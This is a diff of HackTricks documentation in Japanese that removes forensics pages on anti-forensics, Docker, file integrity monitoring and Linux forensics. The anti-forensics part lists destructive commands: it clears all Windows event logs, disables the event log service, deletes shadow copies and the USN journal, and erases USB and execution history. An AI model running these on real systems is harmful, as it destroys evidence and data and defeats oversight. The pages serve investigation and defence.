このツールは、両方の属性`$STARNDAR_INFORMATION``$FILE_NAME`を変更できます。ただし、Windows Vista以降は、ライブOSでこの情報を変更する必要があります。
# データ隠蔽
NFTSはクラスタと最小情報サイズを使用します。つまり、ファイルがクラスタと半分を占有している場合、**残りの半分はファイルが削除されるまで使用されることはありません**。したがって、このスラックスペースに**データを隠すことが可能です**。
slackerのようなツールを使用すると、この「隠された」スペースにデータを隠すことができます。ただし、`$logfile``$usnjrnl`の分析により、いくつかのデータが追加されたことが示される可能性があります:
![](<../../images/image (452).png>)
その後、FTK Imagerのようなツールを使用してスラックスペースを取得することが可能です。この種のツールは、内容を難読化または暗号化して保存することができます。
# UsbKill
これは、**USB**ポートに変更が検出された場合にコンピュータを**シャットダウンする**ツールです。\
これを発見する方法は、実行中のプロセスを調査し、**実行中の各Pythonスクリプトをレビューする**ことです。
# ライブLinuxディストリビューション
これらのディストロは**RAM**メモリ内で**実行されます**。検出する唯一の方法は、**NTFSファイルシステムが書き込み権限でマウントされている場合**です。読み取り権限のみでマウントされている場合、侵入を検出することはできません。
# セキュア削除
[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
# Windows設定
フォレンジック調査をはるかに困難にするために、いくつかのWindowsログ記録方法を無効にすることが可能です。
## タイムスタンプの無効化 - UserAssist
これは、ユーザーによって各実行可能ファイルが実行された日時を保持するレジストリキーです。
UserAssistを無効にするには、2つのステップが必要です
1. 2つのレジストリキー、`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs``HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`をゼロに設定し、UserAssistを無効にしたいことを示します。
2. `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`のようなレジストリサブツリーをクリアします。
## タイムスタンプの無効化 - Prefetch
これは、Windowsシステムのパフォーマンスを向上させる目的で実行されたアプリケーションに関する情報を保存します。ただし、これはフォレンジック実践にも役立ちます。
- `regedit`を実行
- ファイルパス`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`を選択
- `EnablePrefetcher``EnableSuperfetch`の両方を右クリック
- 各々の値を1または3から0に変更するために修正を選択
- 再起動
## タイムスタンプの無効化 - 最終アクセス時刻
NTFSボリュームからフォルダが開かれるたびに、システムは**各リストされたフォルダのタイムスタンプフィールドを更新するための時間を取ります**。これは、最終アクセス時刻と呼ばれます。NTFSボリュームが頻繁に使用される場合、これがパフォーマンスに影響を与える可能性があります。
1. レジストリエディタ (Regedit.exe) を開きます。
2. `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`に移動します。
3. `NtfsDisableLastAccessUpdate`を探します。存在しない場合は、このDWORDを追加し、その値を1に設定してプロセスを無効にします。
4. レジストリエディタを閉じ、サーバーを再起動します。
## USB履歴の削除
すべての**USBデバイスエントリ**は、PCまたはラップトップにUSBデバイスを接続するたびに作成されるサブキーを含む**USBSTOR**レジストリキーの下にWindowsレジストリに保存されます。このキーはここにあります`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`。**これを削除することで**USB履歴を削除します。\
また、[**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html)ツールを使用して、削除したことを確認することもできます(および削除するために)。
USBに関する情報を保存する別のファイルは、`C:\Windows\INF`内の`setupapi.dev.log`ファイルです。これも削除する必要があります。
## シャドウコピーの無効化
**シャドウコピーをリスト**するには、`vssadmin list shadowstorage`を実行します。\
**削除**するには、`vssadmin delete shadow`を実行します。
GUIを介して削除することもできます。手順は[https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)を参照してください。
シャドウコピーを無効にするには、[こちらの手順](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows)を参照してください:
1. Windowsスタートボタンをクリックした後、テキスト検索ボックスに「services」と入力してサービスプログラムを開きます。
2. リストから「Volume Shadow Copy」を見つけて選択し、右クリックしてプロパティにアクセスします。
3. 「スタートアップの種類」ドロップダウンメニューから「無効」を選択し、変更を確認するために「適用」と「OK」をクリックします。
シャドウコピーでコピーされるファイルの構成を変更することも可能です。レジストリ`HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`で設定します。
## 削除されたファイルの上書き
- **Windowsツール**を使用できます:`cipher /w:C` これは、Cドライブ内の未使用のディスクスペースからデータを削除するようにcipherに指示します。
- [**Eraser**](https://eraser.heidi.ie)のようなツールを使用することもできます。
## Windowsイベントログの削除
- Windows + R --> eventvwr.msc --> "Windows Logs"を展開 --> 各カテゴリを右クリックして「ログのクリア」を選択
- `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
- `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
## Windowsイベントログの無効化
- `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
- サービスセクション内で「Windows Event Log」サービスを無効にします。
- `WEvtUtil.exec clear-log`または`WEvtUtil.exe cl`
## $UsnJrnlの無効化
- `fsutil usn deletejournal /d c:`
{{#include ../../banners/hacktricks-training.md}}

96
src/forensics/basic-forensic-methodology/docker-forensics.md
View File

@ -1,96 +0,0 @@
# Docker Forensics
{{#include ../../banners/hacktricks-training.md}}
## コンテナの変更
いくつかのdockerコンテナが侵害された疑いがあります
```bash
docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress
```
このコンテナに対して行われた**イメージに関する変更を簡単に見つけることができます**:
```bash
docker diff wordpress
C /var
C /var/lib
C /var/lib/mysql
A /var/lib/mysql/ib_logfile0
A /var/lib/mysql/ib_logfile1
A /var/lib/mysql/ibdata1
A /var/lib/mysql/mysql
A /var/lib/mysql/mysql/time_zone_leap_second.MYI
A /var/lib/mysql/mysql/general_log.CSV
...
```
前のコマンドで **C****Changed** を意味し、**A** は **Added** を意味します。\
もし `/etc/shadow` のような興味深いファイルが変更されたことがわかった場合、悪意のある活動を確認するために、次のコマンドでコンテナからダウンロードできます:
```bash
docker cp wordpress:/etc/shadow.
```
新しいコンテナを実行し、その中からファイルを抽出することで、**元のものと比較することもできます**。
```bash
docker run -d lamp-wordpress
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
diff original_shadow shadow
```
**いくつかの疑わしいファイルが追加された**場合は、コンテナにアクセスして確認できます:
```bash
docker exec -it wordpress bash
```
## 画像の変更
エクスポートされたdockerイメージおそらく`.tar`形式)を受け取った場合、[**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases)を使用して**変更の概要を抽出**できます:
```bash
docker save <image> > image.tar #Export the image to a .tar file
container-diff analyze -t sizelayer image.tar
container-diff analyze -t history image.tar
container-diff analyze -t metadata image.tar
```
次に、イメージを**解凍**し、**ブロブにアクセス**して、変更履歴で見つけた疑わしいファイルを検索できます:
```bash
tar -xf image.tar
```
### 基本分析
You can get **basic information** from the image running:
```bash
docker inspect <image>
```
変更履歴の要約を取得することもできます:
```bash
docker history --no-trunc <image>
```
イメージから**dockerfileを生成**することもできます:
```bash
alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
```
### Dive
Dockerイメージ内の追加または変更されたファイルを見つけるために、[**dive**](https://github.com/wagoodman/dive)[**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)からダウンロード)ユーティリティを使用することもできます:
```bash
#First you need to load the image in your docker repo
sudo docker load < image.tar 1
Loaded image: flask:latest
#And then open it with dive:
sudo dive flask:latest
```
これにより、**dockerイメージの異なるblobをナビゲート**し、どのファイルが変更または追加されたかを確認できます。**赤**は追加されたことを意味し、**黄色**は変更されたことを意味します。**タブ**を使用して他のビューに移動し、**スペース**を使用してフォルダーを折りたたむ/開くことができます。
dieを使用すると、イメージの異なるステージの内容にアクセスすることはできません。そうするには、**各レイヤーを解凍してアクセスする必要があります**。\
イメージが解凍されたディレクトリから、次のコマンドを実行してすべてのレイヤーを解凍できます:
```bash
tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
```
## メモリからの資格情報
ホスト内でdockerコンテナを実行するとき、**ホストからコンテナで実行されているプロセスを見ることができます**。単に`ps -ef`を実行するだけです。
したがってrootとして、**ホストからプロセスのメモリをダンプし**、**資格情報**を検索することができます。これは[**次の例のように**](../../linux-hardening/privilege-escalation/index.html#process-memory)行います。
{{#include ../../banners/hacktricks-training.md}}

26
src/forensics/basic-forensic-methodology/file-integrity-monitoring.md
View File

@ -1,26 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
# ベースライン
ベースラインは、システムの特定の部分のスナップショットを取得し、**将来の状態と比較して変更を強調表示する**ことから成ります。
例えば、ファイルシステムの各ファイルのハッシュを計算して保存することで、どのファイルが変更されたかを特定できます。\
これは、作成されたユーザーアカウント、実行中のプロセス、実行中のサービス、およびあまり変更されるべきでないその他のものにも適用できます。
## ファイル整合性監視
ファイル整合性監視 (FIM) は、ファイルの変更を追跡することによってIT環境とデータを保護する重要なセキュリティ技術です。これには2つの主要なステップが含まれます
1. **ベースライン比較:** 将来の比較のためにファイル属性または暗号学的チェックサムMD5やSHA-2などを使用してベースラインを確立し、変更を検出します。
2. **リアルタイム変更通知:** ファイルがアクセスまたは変更されたときに即座にアラートを受け取ります。通常、OSカーネル拡張を通じて行われます。
## ツール
- [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
- [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
## 参考文献
- [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
{{#include ../../banners/hacktricks-training.md}}

370
src/forensics/basic-forensic-methodology/linux-forensics.md
View File

@ -1,370 +0,0 @@
# Linux Forensics
{{#include ../../banners/hacktricks-training.md}}
## 初期情報収集
### 基本情報
まず最初に、**良く知られたバイナリとライブラリが入った** **USB** を用意することをお勧めしますubuntuを取得し、フォルダ _/bin_, _/sbin_, _/lib,__/lib64_ をコピーするだけで済みます。次に、USBをマウントし、環境変数を変更してそれらのバイナリを使用します
```bash
export PATH=/mnt/usb/bin:/mnt/usb/sbin
export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64
```
システムを良好で知られたバイナリを使用するように設定したら、**基本的な情報を抽出し始める**ことができます:
```bash
date #Date and time (Clock may be skewed, Might be at a different timezone)
uname -a #OS info
ifconfig -a || ip a #Network interfaces (promiscuous mode?)
ps -ef #Running processes
netstat -anp #Proccess and ports
lsof -V #Open files
netstat -rn; route #Routing table
df; mount #Free space and mounted devices
free #Meam and swap space
w #Who is connected
last -Faiwx #Logins
lsmod #What is loaded
cat /etc/passwd #Unexpected data?
cat /etc/shadow #Unexpected data?
find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
```
#### 疑わしい情報
基本情報を取得する際には、以下のような奇妙な事柄を確認する必要があります:
- **ルートプロセス**は通常低いPIDで実行されるため、大きなPIDを持つルートプロセスを見つけた場合は疑うべきです
- `/etc/passwd`内のシェルを持たないユーザーの**登録されたログイン**を確認します
- シェルを持たないユーザーのために`/etc/shadow`内の**パスワードハッシュ**を確認します
### メモリダンプ
実行中のシステムのメモリを取得するには、[**LiME**](https://github.com/504ensicsLabs/LiME)を使用することをお勧めします。\
**コンパイル**するには、被害者のマシンが使用している**同じカーネル**を使用する必要があります。
> [!NOTE]
> 被害者のマシンに**LiMEやその他のものをインストールすることはできない**ことを覚えておいてください。そうすると、いくつかの変更が加わります。
したがって、同一のUbuntuバージョンがある場合は、`apt-get install lime-forensics-dkms`を使用できます。\
他の場合は、githubから[**LiME**](https://github.com/504ensicsLabs/LiME)をダウンロードし、正しいカーネルヘッダーでコンパイルする必要があります。被害者のマシンの**正確なカーネルヘッダー**を取得するには、単に`/lib/modules/<kernel version>`ディレクトリを自分のマシンに**コピー**し、それを使用してLiMEを**コンパイル**します:
```bash
make -C /lib/modules/<kernel version>/build M=$PWD
sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime"
```
LiMEは3つの**フォーマット**をサポートしています:
- Rawすべてのセグメントが連結されたもの
- Paddedrawと同じですが、右側のビットにゼロが入っています
- Limeメタデータ付きの推奨フォーマット
LiMEは、`path=tcp:4444`のようなもので、システムに保存する代わりに**ネットワーク経由でダンプを送信する**ためにも使用できます。
### ディスクイメージング
#### シャットダウン
まず最初に、**システムをシャットダウンする**必要があります。これは常に選択肢ではなく、時にはシステムが会社がシャットダウンできないプロダクションサーバーであることがあります。\
システムをシャットダウンするには**2つの方法**があります。**通常のシャットダウン**と**「プラグを抜く」シャットダウン**です。最初の方法では、**プロセスが通常通り終了する**ことを許可し、**ファイルシステム**が**同期される**ことを可能にしますが、同時に**マルウェア**が**証拠を破壊する**可能性もあります。「プラグを抜く」アプローチは**情報の損失**を伴う可能性があります(メモリのイメージをすでに取得しているため、失われる情報はあまりありません)し、**マルウェアは何もできる機会がありません**。したがって、**マルウェアの可能性がある**と疑う場合は、システムで**`sync`** **コマンド**を実行し、プラグを抜いてください。
#### ディスクのイメージを取得する
**ケースに関連する何かにコンピュータを接続する前に**、それが**読み取り専用としてマウントされる**ことを確認することが重要です。情報を変更しないようにするためです。
```bash
#Create a raw copy of the disk
dd if=<subject device> of=<image file> bs=512
#Raw copy with hashes along the way (more secure as it checks hashes while it's copying the data)
dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file>
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
```
### ディスクイメージの事前分析
データがこれ以上ないディスクイメージをイメージングする。
```bash
#Find out if it's a disk image using "file" command
file disk.img
disk.img: Linux rev 1.0 ext4 filesystem data, UUID=59e7a736-9c90-4fab-ae35-1d6a28e5de27 (extents) (64bit) (large files) (huge files)
#Check which type of disk image it's
img_stat -t evidence.img
raw
#You can list supported types with
img_stat -i list
Supported image format types:
raw (Single or split raw file (dd))
aff (Advanced Forensic Format)
afd (AFF Multiple File)
afm (AFF with external metadata)
afflib (All AFFLIB image formats (including beta ones))
ewf (Expert Witness Format (EnCase))
#Data of the image
fsstat -i raw -f ext4 disk.img
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: Ext4
Volume Name:
Volume ID: 162850f203fd75afab4f1e4736a7e776
Last Written at: 2020-02-06 06:22:48 (UTC)
Last Checked at: 2020-02-06 06:15:09 (UTC)
Last Mounted at: 2020-02-06 06:15:18 (UTC)
Unmounted properly
Last mounted on: /mnt/disk0
Source OS: Linux
[...]
#ls inside the image
fls -i raw -f ext4 disk.img
d/d 11: lost+found
d/d 12: Documents
d/d 8193: folder1
d/d 8194: folder2
V/V 65537: $OrphanFiles
#ls inside folder
fls -i raw -f ext4 disk.img 12
r/r 16: secret.txt
#cat file inside image
icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret
```
## 既知のマルウェアを検索
### 修正されたシステムファイル
Linuxは、システムコンポーネントの整合性を確保するためのツールを提供しており、潜在的に問題のあるファイルを特定するために重要です。
- **RedHatベースのシステム**: `rpm -Va`を使用して包括的なチェックを行います。
- **Debianベースのシステム**: 初期検証には`dpkg --verify`を使用し、その後`debsums | grep -v "OK$"``apt-get install debsums``debsums`をインストールした後)を実行して問題を特定します。
### マルウェア/ルートキット検出ツール
マルウェアを見つけるのに役立つツールについて学ぶには、以下のページをお読みください:
{{#ref}}
malware-analysis.md
{{#endref}}
## インストールされたプログラムを検索
DebianおよびRedHatシステムでインストールされたプログラムを効果的に検索するには、システムログやデータベースを活用し、一般的なディレクトリでの手動チェックを併用することを検討してください。
- Debianの場合、_**`/var/lib/dpkg/status`**_および_**`/var/log/dpkg.log`**_を調査してパッケージインストールに関する詳細を取得し、`grep`を使用して特定の情報をフィルタリングします。
- RedHatユーザーは、`rpm -qa --root=/mntpath/var/lib/rpm`を使用してインストールされたパッケージのリストを取得できます。
これらのパッケージマネージャーの外部で手動でインストールされたソフトウェアを明らかにするために、_**`/usr/local`**_、_**`/opt`**_、_**`/usr/sbin`**_、_**`/usr/bin`**_、_**`/bin`**_、および_**`/sbin`**_のようなディレクトリを探索してください。ディレクトリリストとシステム固有のコマンドを組み合わせて、既知のパッケージに関連付けられていない実行可能ファイルを特定し、インストールされたすべてのプログラムの検索を強化します。
```bash
# Debian package and log details
cat /var/lib/dpkg/status | grep -E "Package:|Status:"
cat /var/log/dpkg.log | grep installed
# RedHat RPM database query
rpm -qa --root=/mntpath/var/lib/rpm
# Listing directories for manual installations
ls /usr/sbin /usr/bin /bin /sbin
# Identifying non-package executables (Debian)
find /sbin/ -exec dpkg -S {} \; | grep "no path found"
# Identifying non-package executables (RedHat)
find /sbin/ exec rpm -qf {} \; | grep "is not"
# Find exacuable files
find / -type f -executable | grep <something>
```
## 削除された実行中のバイナリの回復
/tmp/exec から実行されたプロセスが削除されたと想像してください。それを抽出することが可能です。
```bash
cd /proc/3746/ #PID with the exec file deleted
head -1 maps #Get address of the file. It was 08048000-08049000
dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it
```
## 自動起動場所の検査
### スケジュールされたタスク
```bash
cat /var/spool/cron/crontabs/* \
/var/spool/cron/atjobs \
/var/spool/anacron \
/etc/cron* \
/etc/at* \
/etc/anacrontab \
/etc/incron.d/* \
/var/spool/incron/* \
#MacOS
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
```
### サービス
マルウェアがサービスとしてインストールされる可能性のあるパス:
- **/etc/inittab**: rc.sysinitのような初期化スクリプトを呼び出し、さらにスタートアップスクリプトに指示します。
- **/etc/rc.d/** および **/etc/rc.boot/**: サービスのスタートアップ用スクリプトを含み、後者は古いLinuxバージョンで見られます。
- **/etc/init.d/**: Debianのような特定のLinuxバージョンでスタートアップスクリプトを保存するために使用されます。
- サービスは、Linuxのバリアントに応じて **/etc/inetd.conf** または **/etc/xinetd/** を介しても有効化されることがあります。
- **/etc/systemd/system**: システムおよびサービスマネージャースクリプトのためのディレクトリ。
- **/etc/systemd/system/multi-user.target.wants/**: マルチユーザーランレベルで起動すべきサービスへのリンクを含みます。
- **/usr/local/etc/rc.d/**: カスタムまたはサードパーティのサービス用。
- **\~/.config/autostart/**: ユーザー固有の自動スタートアプリケーション用で、ユーザーをターゲットにしたマルウェアの隠れ場所になる可能性があります。
- **/lib/systemd/system/**: インストールされたパッケージによって提供されるシステム全体のデフォルトユニットファイル。
### カーネルモジュール
Linuxカーネルモジュールは、マルウェアがルートキットコンポーネントとして利用することが多く、システムブート時にロードされます。これらのモジュールにとって重要なディレクトリとファイルは以下の通りです
- **/lib/modules/$(uname -r)**: 実行中のカーネルバージョンのモジュールを保持します。
- **/etc/modprobe.d**: モジュールのロードを制御するための設定ファイルを含みます。
- **/etc/modprobe** および **/etc/modprobe.conf**: グローバルモジュール設定用のファイル。
### その他の自動スタート場所
Linuxは、ユーザーログイン時にプログラムを自動的に実行するためのさまざまなファイルを使用し、マルウェアを隠す可能性があります
- **/etc/profile.d/**\*, **/etc/profile**、および **/etc/bash.bashrc**: すべてのユーザーログイン時に実行されます。
- **\~/.bashrc**、**\~/.bash_profile**、**\~/.profile**、および **\~/.config/autostart**: ユーザー固有のファイルで、ログイン時に実行されます。
- **/etc/rc.local**: すべてのシステムサービスが起動した後に実行され、マルチユーザー環境への移行の終了を示します。
## ログの調査
Linuxシステムは、さまざまなログファイルを通じてユーザーの活動やシステムイベントを追跡します。これらのログは、不正アクセス、マルウェア感染、その他のセキュリティインシデントを特定するために重要です。主要なログファイルには以下が含まれます
- **/var/log/syslog** (Debian) または **/var/log/messages** (RedHat): システム全体のメッセージや活動をキャプチャします。
- **/var/log/auth.log** (Debian) または **/var/log/secure** (RedHat): 認証試行、成功したログインおよび失敗したログインを記録します。
- `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` を使用して関連する認証イベントをフィルタリングします。
- **/var/log/boot.log**: システム起動メッセージを含みます。
- **/var/log/maillog** または **/var/log/mail.log**: メールサーバーの活動をログに記録し、メール関連サービスの追跡に役立ちます。
- **/var/log/kern.log**: カーネルメッセージを保存し、エラーや警告を含みます。
- **/var/log/dmesg**: デバイスドライバーメッセージを保持します。
- **/var/log/faillog**: 失敗したログイン試行を記録し、セキュリティ侵害の調査に役立ちます。
- **/var/log/cron**: cronジョブの実行をログに記録します。
- **/var/log/daemon.log**: バックグラウンドサービスの活動を追跡します。
- **/var/log/btmp**: 失敗したログイン試行を文書化します。
- **/var/log/httpd/**: Apache HTTPDのエラーログとアクセスログを含みます。
- **/var/log/mysqld.log** または **/var/log/mysql.log**: MySQLデータベースの活動をログに記録します。
- **/var/log/xferlog**: FTPファイル転送を記録します。
- **/var/log/**: ここで予期しないログを常に確認します。
> [!NOTE]
> Linuxシステムのログと監査サブシステムは、侵入やマルウェアのインシデントで無効化または削除される可能性があります。Linuxシステムのログは、悪意のある活動に関する最も有用な情報を含むことが一般的であるため、侵入者は定期的にそれらを削除します。したがって、利用可能なログファイルを調査する際には、削除や改ざんの兆候である可能性のあるギャップや順序が乱れたエントリを探すことが重要です。
**Linuxは各ユーザーのコマンド履歴を保持します**。これは以下に保存されます:
- \~/.bash_history
- \~/.zsh_history
- \~/.zsh_sessions/\*
- \~/.python_history
- \~/.\*\_history
さらに、`last -Faiwx` コマンドはユーザーログインのリストを提供します。未知または予期しないログインがないか確認してください。
追加の特権を付与できるファイルを確認します:
- 予期しないユーザー権限が付与されている可能性があるため、`/etc/sudoers` を確認します。
- 予期しないユーザー権限が付与されている可能性があるため、`/etc/sudoers.d/` を確認します。
- 異常なグループメンバーシップや権限を特定するために、`/etc/groups` を調査します。
- 異常なグループメンバーシップや権限を特定するために、`/etc/passwd` を調査します。
一部のアプリも独自のログを生成します:
- **SSH**: 不正なリモート接続のために _\~/.ssh/authorized_keys_ と _\~/.ssh/known_hosts_ を調査します。
- **Gnome Desktop**: Gnomeアプリケーションを介して最近アクセスされたファイルのために _\~/.recently-used.xbel_ を確認します。
- **Firefox/Chrome**: 疑わしい活動のために _\~/.mozilla/firefox_ または _\~/.config/google-chrome_ でブラウザの履歴とダウンロードを確認します。
- **VIM**: アクセスされたファイルパスや検索履歴などの使用詳細のために _\~/.viminfo_ を確認します。
- **Open Office**: 侵害されたファイルを示す可能性のある最近の文書アクセスを確認します。
- **FTP/SFTP**: 不正なファイル転送の可能性があるため、_ \~/.ftp_history_ または _\~/.sftp_history_ のログを確認します。
- **MySQL**: 実行されたMySQLクエリを調査するために _\~/.mysql_history_ を調査し、不正なデータベース活動を明らかにします。
- **Less**: 表示されたファイルや実行されたコマンドを含む使用履歴のために _\~/.lesshst_ を分析します。
- **Git**: リポジトリの変更を確認するために _\~/.gitconfig_ とプロジェクトの _.git/logs_ を調査します。
### USBログ
[**usbrip**](https://github.com/snovvcrash/usbrip) は、Linuxのログファイルディストリビューションに応じて `/var/log/syslog*` または `/var/log/messages*`を解析してUSBイベント履歴テーブルを構築するために純粋なPython 3で書かれた小さなソフトウェアです。
使用されたすべてのUSBを知ることは興味深く、"違反イベント"そのリストに含まれていないUSBの使用を見つけるために、承認されたUSBのリストがあるとさらに有用です。
### インストール
```bash
pip3 install usbrip
usbrip ids download #Download USB ID database
```
### 例
```bash
usbrip events history #Get USB history of your curent linux machine
usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user
#Search for vid and/or pid
usbrip ids download #Downlaod database
usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
```
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
## ユーザーアカウントとログオン活動のレビュー
_**/etc/passwd**_、_**/etc/shadow**_、および**セキュリティログ**を調べて、知られている不正なイベントに近い位置で作成または使用された異常な名前やアカウントを探します。また、sudoのブルートフォース攻撃の可能性も確認してください。\
さらに、_**/etc/sudoers**_や_**/etc/groups**_のようなファイルをチェックして、ユーザーに与えられた予期しない特権を確認します。\
最後に、**パスワードなし**または**簡単に推測できる**パスワードを持つアカウントを探します。
## ファイルシステムの調査
### マルウェア調査におけるファイルシステム構造の分析
マルウェアインシデントを調査する際、ファイルシステムの構造は重要な情報源であり、イベントの順序やマルウェアの内容を明らかにします。しかし、マルウェアの著者は、ファイルのタイムスタンプを変更したり、データストレージのためにファイルシステムを避けたりするなど、この分析を妨げる技術を開発しています。
これらのアンチフォレンジック手法に対抗するためには、以下が重要です:
- **Autopsy**のようなツールを使用してイベントのタイムラインを視覚化するために、**徹底的なタイムライン分析を実施する**か、**Sleuth Kitの**`mactime`を使用して詳細なタイムラインデータを取得します。
- 攻撃者によって使用されるシェルやPHPスクリプトを含む可能性のある、システムの$PATH内の**予期しないスクリプトを調査する**。
- **/dev**内の異常なファイルを調べる。通常、特別なファイルが含まれていますが、マルウェア関連のファイルが存在する可能性があります。
- **隠しファイルやディレクトリを検索する**。名前が「.. 」(ドットドットスペース)や「..^G」(ドットドットコントロール-G)のようなものは、悪意のあるコンテンツを隠している可能性があります。
- 攻撃者によって悪用される可能性のある、特権が昇格されたファイルを見つけるために、次のコマンドを使用して**setuid rootファイルを特定する**`find / -user root -perm -04000 -print`
- ルートキットやトロイの木馬の存在を示す可能性がある、大量のファイル削除を示すために、inodeテーブル内の**削除タイムスタンプをレビューする**。
- 1つの悪意のあるファイルを特定した後、近くの悪意のあるファイルのために**連続したinodeを検査する**。これらは一緒に配置されている可能性があります。
- マルウェアによって変更される可能性があるため、最近変更されたファイルのために**一般的なバイナリディレクトリ**(_/bin_、_/sbin_)を確認する。
````bash
# List recent files in a directory:
ls -laR --sort=time /bin```
# Sort files in a directory by inode:
ls -lai /bin | sort -n```
````
> [!NOTE]
> 攻撃者は**ファイルを正当なものに見せるために** **時間を変更することができます**が、**inodeを変更することはできません**。もし**ファイル**が同じフォルダ内の他のファイルと**同時に作成および変更された**ことを示しているが、**inodeが予期せず大きい**場合、その**ファイルのタイムスタンプが変更された**ことになります。
## 異なるファイルシステムバージョンの比較
### ファイルシステムバージョン比較の概要
ファイルシステムのバージョンを比較し、変更点を特定するために、簡略化された`git diff`コマンドを使用します:
- **新しいファイルを見つけるために**、2つのディレクトリを比較します
```bash
git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/
```
- **変更された内容**、特定の行を無視して変更をリストします:
```bash
git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time"
```
- **削除されたファイルを検出するには**:
```bash
git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/
```
- **フィルターオプション** (`--diff-filter`) は、追加された (`A`)、削除された (`D`)、または変更された (`M`) ファイルなど、特定の変更に絞り込むのに役立ちます。
- `A`: 追加されたファイル
- `C`: コピーされたファイル
- `D`: 削除されたファイル
- `M`: 変更されたファイル
- `R`: 名前が変更されたファイル
- `T`: タイプの変更 (例: ファイルからシンボリックリンク)
- `U`: マージされていないファイル
- `X`: 不明なファイル
- `B`: 壊れたファイル
## 参考文献
- [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf)
- [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
- [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203)
- **書籍: Linuxシステムのマルウェアフォレンジックフィールドガイド: デジタルフォレンジックフィールドガイド**
{{#include ../../banners/hacktricks-training.md}}

154
src/forensics/basic-forensic-methodology/malware-analysis.md
View File

@ -1,154 +0,0 @@
# マルウェア分析
{{#include ../../banners/hacktricks-training.md}}
## フォレンジック チートシート
[https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/)
## オンラインサービス
- [VirusTotal](https://www.virustotal.com/gui/home/upload)
- [HybridAnalysis](https://www.hybrid-analysis.com)
- [Koodous](https://koodous.com)
- [Intezer](https://analyze.intezer.com)
- [Any.Run](https://any.run/)
## オフラインアンチウイルスおよび検出ツール
### Yara
#### インストール
```bash
sudo apt-get install -y yara
```
#### ルールの準備
このスクリプトを使用して、githubからすべてのyaraマルウェアルールをダウンロードしてマージします: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
_**rules**_ ディレクトリを作成し、実行します。これにより、すべてのマルウェア用のyaraルールを含む _**malware_rules.yar**_ というファイルが作成されます。
```bash
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules
python malware_yara_rules.py
```
#### スキャン
```bash
yara -w malware_rules.yar image #Scan 1 file
